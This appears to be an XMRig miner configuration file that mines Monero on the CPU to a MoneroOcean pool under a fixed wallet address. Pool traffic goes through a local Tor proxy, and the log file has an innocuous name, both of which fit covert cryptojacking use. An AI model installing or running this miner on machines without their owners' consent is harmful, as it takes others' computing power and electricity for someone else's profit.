{
    "api": {
        "id": null,
        "worker-id": null
    },
    "http": {
        "enabled": false,
        "host": "127.0.0.1",
        "port": 0,
        "access-token": null,
        "restricted": true
    },
    "autosave": true,
    "background": false,
    "colors": true,
    "title": true,
    "log-file": "mod.log",
    "randomx": {
        "init": -1,
        "init-avx2": -1,
        "mode": "auto",
        "1gb-pages": true,
        "rdmsr": true,
        "wrmsr": true,
        "cache_qos": true,
        "numa": true,
        "scratchpad_prefetch_mode": 3
    },
    "cpu": {
        "enabled": true,
        "huge-pages": true,
        "huge-pages-jit": true,
        "hw-aes": true,
        "priority": 0,
        "memory-pool": true,
        "yield": false,
        "asm": true,
        "argon2-impl": null,
        "argon2": [
            0
        ],
        "cn": [
            [
                8,
                0
            ]
        ],
        "cn-heavy": [
            [
                8,
                0
            ]
        ],
        "cn-lite": [
            [
                8,
                0
            ]
        ],
        "cn-pico": [
            [
                8,
                0
            ]
        ],
        "cn\/upx2": [
            [
                8,
                0
            ]
        ],
        "ghostrider": [
            [
                8,
                0
            ]
        ],
        "rx": [
            2,
            4,
            6,
            8
        ],
        "rx\/wow": [
            8,
            0
        ],
        "cn-lite\/0": false,
        "cn\/0": false,
        "rx\/arq": "rx\/wow"
    },
    "opencl": {
        "enabled": false,
        "cache": true,
        "loader": null,
        "platform": "AMD",
        "adl": true,
        "cn-lite\/0": false,
        "cn\/0": false
    },
    "cuda": {
        "enabled": false,
        "loader": null,
        "nvml": true,
        "cn-lite\/0": false,
        "cn\/0": false
    },
    "donate-level": 0,
    "donate-over-proxy": 1,
    "pools": [
        {
            "algo": "rx",
            "coin": "XMR",
            "url": "gulf.moneroocean.stream:10128",
            "user": "43PWkzeWWt57hxPbTYLm9B9u7j8YfER19GtBrkbyETaMegvkfxKACxTKVvYo6ZXU9qMAorSDnxzY7UwZcakf98PaUdnJPn3",
            "pass": "x",
            "rig-id": "3-asies",
            "nicehash": false,
            "keepalive": false,
            "enabled": true,
            "tls": false,
            "sni": false,
            "tls-fingerprint": null,
            "daemon": false,
             "socks5": "127.0.0.1:9050",
            "self-select": null,
            "submit-to-origin": false
        }
    ],
    "retries": 5,
    "retry-pause": 5,
    "print-time": 60,
    "health-print-time": 60,
    "dmi": true,
    "syslog": false,
    "tls": {
        "enabled": false,
        "protocols": null,
        "cert": null,
        "cert_key": null,
        "ciphers": null,
        "ciphersuites": null,
        "dhparam": null
    },
    "dns": {
        "ipv6": false,
        "ttl": 30
    },
    "user-agent": null,
    "verbose": 0,
    "watch": true,
    "pause-on-battery": false,
    "pause-on-active": false
}